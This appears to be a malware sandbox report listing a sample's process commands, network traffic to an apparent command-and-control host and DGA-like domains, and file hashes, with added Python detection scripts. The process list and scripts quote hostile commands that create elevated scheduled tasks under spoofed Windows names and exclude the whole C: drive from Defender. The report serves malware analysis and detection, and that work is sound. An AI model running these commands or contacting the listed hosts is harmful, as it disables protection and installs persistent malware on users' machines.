schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Default\Pictures\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Pictures\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\DigitalLocker\en-US\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\DigitalLocker\en-US\csrss.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

"C:\Users\Default\Pictures\SppExtComObj.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51c82dce-5312-4145-b6d5-a694049ccbb8.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f35d6936-9a7b-40ae-b481-da287ac57f8b.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ce590d51-0cb2-44dc-8e65-121e8153d484.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b1b51caf-91c6-427d-8f58-c40896abb817.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\148a01bf-bd23-4ec9-9c42-b1618ecd5007.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b9a4a5f5-fdf8-4559-9eec-5e6486109140.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f723110b-7234-47ef-b0d7-4c1089c6d9e6.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\581ecb92-2e02-4227-9946-640cf5abbdda.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f0827014-d545-4ea1-992f-a56136e1993a.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3e015ce3-3a8c-425b-8ed2-2c03355d1220.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\915bf969-118f-4c69-8afe-3197b5e00399.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\522ae4ed-5c83-4f59-9ee4-6403a0ba39a3.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b30bde46-d5ef-418f-a407-7c23f7b37c4b.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a2830e49-12ac-4424-90ed-7bc3465784b7.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8ac4265a-98b4-465f-bddb-9022819b87ab.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3f65f74e-89d7-41f6-b872-7425e9339386.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5939dafa-4376-45fd-8605-9d7a42c6d1ef.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b53c5c15-b968-40d4-b516-d2fed4f1fa3e.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b7ba8ec-503f-4cc4-932f-b7e84e7daf00.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\47e3612d-9b29-40ca-97cf-8241ef7509e7.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe
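
The process list above is the sample's persistence and defence-evasion chain laid out in full: for each dropped copy named after a genuine Windows binary (sppsvc, RuntimeBroker, csrss, dwm, fontdrvhost, SppExtComObj, OfficeClickToRun) placed outside System32, three schtasks /create calls (a MINUTE-cadence task, an ONLOGON task at /rl HIGHEST, and a second MINUTE task at /rl HIGHEST); eleven Add-MpPreference -ExclusionPath calls that exclude the drive root and every top-level directory of C: from Defender; and WScript launching GUID-named .vbs files from the user's Temp directory. The following Python is an added example, not part of the sandbox report, that runs those three checks over process command lines. The sample lines are copied from the list above, with two constructed benign controls; the rule names, the system-directory allow-list and the exclusion-depth threshold are the editor's assumptions, not a vendor signature set.

```python
"""Heuristic triage of schtasks / Add-MpPreference / wscript command lines.

Added example, not part of the sandbox report.  Input is any list of process
command lines (Sysmon Event ID 1, 4688, EDR telemetry); output is a list of
Finding(rule, detail).  Rule names and thresholds are the editor's choices.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Names of genuine Windows binaries that the dropped copies borrow.
SYSTEM_BINARIES = {"sppsvc.exe", "sppextcomobj.exe", "runtimebroker.exe",
                   "csrss.exe", "dwm.exe", "fontdrvhost.exe"}
# Directories where those names are legitimately installed.
LEGIT_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
GUID_VBS = re.compile(r"[\\/][0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\.vbs$", re.I)
TOKEN = re.compile(r'''"[^"]*"|'[^']*'|\S+''')


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def tokenize(cmd):
    """Split a Windows command line, keeping "..." and '...' groups whole."""
    return [t.strip("\"'") for t in TOKEN.findall(cmd)]


def option(tokens, name):
    """Value that follows the switch `name` (case-insensitive), or None."""
    low = [t.lower() for t in tokens]
    return tokens[low.index(name) + 1] if name in low[:-1] else None


def check_schtasks(tokens):
    """Task persistence: system-binary name outside System32, HIGHEST + MINUTE."""
    low = [t.lower() for t in tokens]
    if not low or not low[0].endswith("schtasks.exe") or "/create" not in low:
        return []
    action = option(tokens, "/tr") or ""
    exe = action.lower().rsplit("\\", 1)[-1]
    out = []
    if exe in SYSTEM_BINARIES and not action.lower().startswith(LEGIT_DIRS):
        out.append(Finding("masquerading-task-action", f"{exe} run from {action}"))
    if (option(tokens, "/rl") or "").upper() == "HIGHEST" and \
            (option(tokens, "/sc") or "").upper() == "MINUTE":
        out.append(Finding("recurring-highest-task",
                           f"{option(tokens, '/tn')} every {option(tokens, '/mo')} min"))
    return out


def check_defender(tokens):
    """Add-MpPreference -ExclusionPath on a drive root or a top-level folder."""
    low = [t.lower() for t in tokens]
    if "add-mppreference" not in low or "-exclusionpath" not in low:
        return []
    path = option(tokens, "-exclusionpath") or ""
    depth = path.replace("\\", "/").rstrip("/").count("/")   # C:/ -> 0, C:/Users/ -> 1
    return [Finding("defender-broad-exclusion", path)] if depth <= 1 else []


def check_wscript(tokens):
    """wscript.exe launching a GUID-named .vbs out of a Temp directory."""
    if not tokens or not tokens[0].lower().endswith("wscript.exe"):
        return []
    return [Finding("guid-named-vbs-launcher", t) for t in tokens[1:]
            if GUID_VBS.search(t) and "\\temp\\" in t.lower()]


def analyze(command_lines):
    findings = []
    for cmd in command_lines:
        toks = tokenize(cmd)
        findings += check_schtasks(toks) + check_defender(toks) + check_wscript(toks)
    return findings


def summarize(findings):
    """Number of findings per rule name."""
    return dict(Counter(f.rule for f in findings))


SAMPLE = [
    # Copied from the report's process list:
    r"""schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f""",
    r"""schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\PLA\RuntimeBroker.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\DigitalLocker\en-US\csrss.exe'" /rl HIGHEST /f""",
    '"powershell" -Command Add-MpPreference -ExclusionPath \'C:/\'',
    '"powershell" -Command Add-MpPreference -ExclusionPath \'C:/Program Files/\'',
    r'''"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51c82dce-5312-4145-b6d5-a694049ccbb8.vbs"''',
    # Constructed benign controls (not from the report):
    r"""schtasks.exe /create /tn "NightlyBackup" /sc DAILY /tr "C:\Tools\backup.cmd" /f""",
    r"""schtasks.exe /create /tn "BrokerCheck" /sc ONLOGON /tr "C:\Windows\System32\RuntimeBroker.exe" /f""",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE):
        print(f"{f.rule:28} {f.detail}")
    print(summarize(analyze(SAMPLE)))
```

The allow-list of legitimate directories is what makes the masquerading rule usable: the names themselves are all real Windows binaries, so the signal is a known name in an unexpected directory (C:\Recovery\WindowsRE, C:\Windows\PLA, C:\Users\Default\Pictures), not the name alone. The exclusion rule deliberately ignores deep paths because narrow developer exclusions are common; the eleven root-level exclusions above are not.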

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 81888.cllt.nyashteam.ru udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 200.186.67.172.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
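
The network table shows three kinds of traffic: PTR lookups for contacted addresses (the in-addr.arpa rows), repeated DNS queries for two long, consonant-heavy names under .cc and .cx that never receive a TCP connection anywhere in this table, and DNS plus port-80 TCP to 81888.cllt.nyashteam.ru at 172.67.186.200. The following Python is an added example, not part of the sandbox report, that parses rows in this table's layout, aggregates connections per registrable domain and scores the second-level label by vowel ratio and longest consonant run so the two algorithmically looking names stand out from the named C2 host. The rows are copied from the table above; the approximation of the registrable domain as the last two labels (no public-suffix list) and the thresholds are the editor's assumptions.

```python
"""Lexical triage of the DNS names in a sandbox network table.

Added example, not part of the sandbox report.  Registrable domain is
approximated as the last two labels (simplification: wrong for co.uk-style
suffixes); thresholds are the editor's, tuned only against the rows below.
"""
VOWELS = set("aeiou")

# Copied from the report's Network table (Country Destination Domain Proto).
SAMPLE_ROWS = """
Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 81888.cllt.nyashteam.ru udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 200.186.67.172.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
""".strip().splitlines()


def lexical(label):
    """(vowel ratio, longest consonant run) for one DNS label; y counts as a consonant."""
    letters = [c for c in label.lower() if c.isalpha()]
    ratio = sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0
    run = best = 0
    for c in label.lower():
        run = run + 1 if c.isalpha() and c not in VOWELS else 0
        best = max(best, run)
    return ratio, best


def registrable(domain):
    """Last two labels, e.g. 81888.cllt.nyashteam.ru -> nyashteam.ru (simplification)."""
    parts = domain.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def parse_rows(rows):
    """Yield (destination, domain, proto) from the report's space-separated table."""
    for row in rows:
        fields = row.split()
        if len(fields) != 4 or fields[0] == "Country":
            continue
        _, dest, domain, proto = fields
        if domain.endswith(".in-addr.arpa"):   # PTR lookups of contacted IPs, not indicators
            continue
        yield dest, domain, proto


def analyze_network(rows, min_len=20, max_vowel_ratio=0.3, min_run=5):
    """Aggregate per registrable domain and flag DGA-looking second-level labels."""
    out = {}
    for dest, domain, proto in parse_rows(rows):
        rec = out.setdefault(registrable(domain),
                             {"connections": 0, "protos": set(), "destinations": set()})
        rec["connections"] += 1
        rec["protos"].add(proto)
        rec["destinations"].add(dest)
    for key, rec in out.items():
        sld = key.split(".")[0]
        ratio, run = lexical(sld)
        rec["vowel_ratio"] = round(ratio, 3)
        rec["consonant_run"] = run
        rec["suspicious"] = len(sld) >= min_len and (ratio < max_vowel_ratio or run >= min_run)
    return out


if __name__ == "__main__":
    for dom, rec in analyze_network(SAMPLE_ROWS).items():
        flag = "DGA-like" if rec["suspicious"] else "ok"
        print(f"{dom:45} {rec['connections']:2} conn  vowels={rec['vowel_ratio']:.2f} "
              f"run={rec['consonant_run']:2}  {flag}")
```

The two long names are only ever queried (udp to 8.8.8.8:53) and the only TCP session goes to the nyashteam.ru host, so a block on the .cc/.cx names changes nothing for this run; the actionable indicators here are the nyashteam.ru subdomain and 172.67.186.200:80, with the lexical score serving to separate fallback or decoy names from the real C2 in larger tables.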

Files

memory/4384-0-0x00007FFC14420000-0x00007FFC14775000-memory.dmp

memory/4384-1-0x0000000000760000-0x0000000000C54000-memory.dmp

memory/4384-2-0x00007FFC14420000-0x00007FFC14775000-memory.dmp

memory/4384-3-0x000000001BBA0000-0x000000001BCCE000-memory.dmp

memory/4384-4-0x0000000002E70000-0x0000000002E8C000-memory.dmp

memory/4384-5-0x000000001BA10000-0x000000001BA60000-memory.dmp

memory/4384-6-0x0000000002D00000-0x0000000002D08000-memory.dmp

memory/4384-7-0x0000000002E90000-0x0000000002EA0000-memory.dmp

memory/4384-8-0x000000001B9C0000-0x000000001B9D6000-memory.dmp

memory/4384-9-0x000000001B9E0000-0x000000001B9F0000-memory.dmp

memory/4384-10-0x000000001B9F0000-0x000000001B9FA000-memory.dmp

memory/4384-11-0x000000001BA00000-0x000000001BA12000-memory.dmp

memory/4384-12-0x000000001C700000-0x000000001CC28000-memory.dmp

memory/4384-15-0x000000001C1D0000-0x000000001C1DE000-memory.dmp

memory/4384-14-0x000000001BB80000-0x000000001BB8E000-memory.dmp

memory/4384-13-0x000000001BB70000-0x000000001BB7A000-memory.dmp

memory/4384-16-0x000000001C1E0000-0x000000001C1E8000-memory.dmp

memory/4384-18-0x000000001C300000-0x000000001C30C000-memory.dmp

memory/4384-17-0x000000001C1F0000-0x000000001C1F8000-memory.dmp

C:\Recovery\WindowsRE\sppsvc.exe

MD5 362ac52b63b9f6608733e6da0f41b8a0
SHA1 4351bcc1035d37bc58f641fb58b08f80949f9129
SHA256 f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcaf
SHA512 8f60c2beb708deef5de53c33ee8224456ac9d9a7e3ad1eeacd786b79f2511342626910d5653b6870ea2a8c5448f6ca46ca6cfa09adb0ed1407812e7522771203

C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe

MD5 e0a68b98992c1699876f818a22b5b907
SHA1 d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA256 2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512 856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

memory/3076-71-0x0000000000400000-0x0000000000407000-memory.dmp

C:\Windows\Temp\MsEdgeCrashpad\reports\SppExtComObj.exe

MD5 b2fb4202cfe66b5b17cf8e330059bb3a
SHA1 57ba5e3b143c6bf87dd901c98f2979ec82f66289
SHA256 b722c221da13a7e7aa2136aed91ee15a70e46be244bad21029799dd2bac83586
SHA512 e801a9e4e91029b49ba4dc86b5c8d9a85d1b0abe111d3e2f1bb4b816d4ad1aeba3fa04bd4f577f1630d9c3cc2fa3d6a31ed1bd9fe24b06255418b4acb64c52ce

memory/4320-132-0x0000023BB47B0000-0x0000023BB47D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b01wmmgm.0xy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4384-223-0x00007FFC14420000-0x00007FFC14775000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

memory/540-235-0x000000001BDB0000-0x000000001BDC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd5940f08d0be56e65e5f2aaf47c538e
SHA1 d7e31b87866e5e383ab5499da64aba50f03e8443
SHA256 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512 c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe.log

MD5 bbb951a34b516b66451218a3ec3b0ae1
